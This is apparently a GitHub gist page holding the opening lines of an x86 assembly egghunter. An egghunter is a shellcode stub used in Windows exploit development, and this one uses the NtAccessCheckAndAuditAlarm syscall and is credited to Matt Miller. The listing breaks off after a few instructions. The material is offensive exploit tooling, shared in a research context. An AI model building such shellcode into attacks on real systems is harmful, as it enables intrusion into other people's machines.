notsoshant
/ NtAccessCheckAndAuditAlarm_egghunter.s
Last active
February 12, 2019 20:14
Egghunter that uses NtAccessCheckAndAuditAlarm. Thanks to Skape (http://www.hick.org/~mmiller/shellcode/win32/egghunt_syscall.c)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Author: Matt Miller (@epakskape) | |
| // Taken from http://www.hick.org/~mmiller/shellcode/win32/egghunt_syscall.c | |
| entry: | |
| // You could put an xor edx, edx here to make the search somewhat | |
| // quicker, but given page aligned searching, it really isn't that bad | |
| // to omit it, and it saves two bytes. | |
| loop_inc_page: | |
| or dx, 0x0fff // Add PAGE_SIZE-1 to edx | |
| loop_inc_one: |
NewerOlder